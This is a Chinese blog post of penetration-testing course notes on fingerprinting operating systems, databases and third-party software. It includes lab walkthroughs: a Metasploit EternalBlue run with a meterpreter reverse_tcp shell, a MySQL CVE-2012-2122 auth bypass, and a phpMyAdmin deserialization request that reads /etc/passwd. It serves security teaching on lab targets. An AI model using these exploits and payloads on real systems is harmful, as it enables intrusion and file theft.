Day05 基础入门-系统及数据库等

Day05 基础入门-系统及数据库等

声明:本文章仅仅是个人学习笔记,仅供交流学习使用,请勿用于非法用途

——小迪web安全渗透培训视频笔记

前言

除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。

内容

操作系统层面

识别操作系统常见方法

通过网站或通过扫描相关软件识别

1. 通过url的大小写改变来判断服务器系统

大小写对网页都没有影响,这种情况就可以认定为windows服务器,因为windows服务器不区分大小写

大小写改变会报错,这个网站对应的操作系统是linux服务器

2. 也可以用TTL来判断服务器系统,相邻的值来判断

3. 可用nmap来判断操作系统

nmap -O IP

简要两者区别及识别意义

网站路径、大小写、文件在两个系统之间的适用性,兼容性

操作系统层面漏洞类型对应意义

有些漏洞危害不大,而有些漏洞会导致服务器权限的丢失。

漏洞类型的不同会造成利用这个漏洞时的条件

简要操作系统层面漏洞影响范围

利用漏洞去获取权限或者对某些服务进行干扰

数据库层面

识别数据库类型常见方法

通过网站识别数据库,通过脚本连接的数据库

ASP+Access(windows) 端口:无
PHP+Mysql 端口:3306
ASPX+Mssql(windows) 端口:1433
Jsp+Mssql,oracle 端口:1521
Python+Mongodb 端口:27017

端口扫描

数据库类型区别及识别意义

每个数据库里面的安全机制,写法结构都有些许不一样,同样产生的漏洞也不一样。

数据库常见漏洞类型及攻击

弱口令

简要数据库层面漏洞影响范围

得到网站管理员数据可登录后台,得到用户数据能登录用户信息,进行修改,通过数据库操作可进行漏洞攻击,也可以获取数据库权限和网站权限。

第三方层面

如何判断有哪些第三方平台或软件

多层次判断,不能仅限于端口扫描,根据不同的应用采取不同的方法。

简要为什么要识别第三方平台或软件

常见第三方平台或软件漏洞类型及攻击
简要第三方平台或软件安全测试的范围

补充

除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件、游戏、负载均衡等)也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!

案例演示

  • 上述涉及的基础知识演示
  • 某操作系统层面漏洞演示
  • 某数据库弱口令及漏洞演示
  • 某第三方应用安全漏洞

以下案例不需要掌握漏洞的利用,只是了解一下各层面的漏洞

案例1:上述涉及的基础知识演示

详细看内容部分

案例2:某操作系统层面漏洞演示

本实验是在靶机进行的,请勿用于未授权的真实环境中,否则后果自负。

环境配置

靶机

win2008R2 x64
IP:192.168.3.31

445端口开放

攻击机

kali

IP:192.168.3.222

操作

打开msf

msfconsole	# 打开msf

use exploit/multi/handle

use exploit/windows/smb/ms17_010_eternalblue	

set payload windows/x64/meterpreter/reverse_tcp		# 设置payload

查看配置参数

msf5> show options 

设置参数

set lhost 192.168.3.222		# 设置本机地址(即攻击机的IP)

set rhost 192.168.3.31		# 设置目标地址

run

拿到权限

meterpreter > shell

meterpreter > ipconfig

可以看到ipconfig命令打印出来靶机IP:192.168.3.31

案例3:某数据库弱口令及漏洞演示

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

环境配置

靶机

Ubuntu + vulhub靶场环境

IP:192.168.131.135

攻击机

kali

操作

开启靶场环境(mysql漏洞环境)

cd vulhub靶场项目目录

cd mysql/CVE-2012-2122/

docker-compose up -d

进行攻击

nmap扫描端口

发现端口3306开放,对应mysql数据库服务

查找mysql数据库漏洞 ,符合 CVE-2012-2122 Mysql身份认证绕过漏洞

利用msf进行漏洞测试

成功

案例4:某第三方应用安全漏洞演示

https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/

环境配置

靶场

Ubuntu + vulhub靶场环境

IP:192.168.56.130

攻击机

win10 本地物理机

操作

开启漏洞环境

访问http://your-ip:8080,您将看到 phpmyadmin 主页。因为没有连接到数据库,我们会得到一个错误。但是这个漏洞与数据库无关,所以直接忽略。

Burpsuite发包

发送以下包 /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

记得把 your-ip改成靶机的IP

结果

涉及资源

https://nmap.org/ # nmap

https://www.kali.org/ # kali官网

https://vulhub.org/ # vulhub

https://github.com/hellogoldsnakeman/masnmapscan-V1.0 # masnmapscan端口扫描器

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风羽墨客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值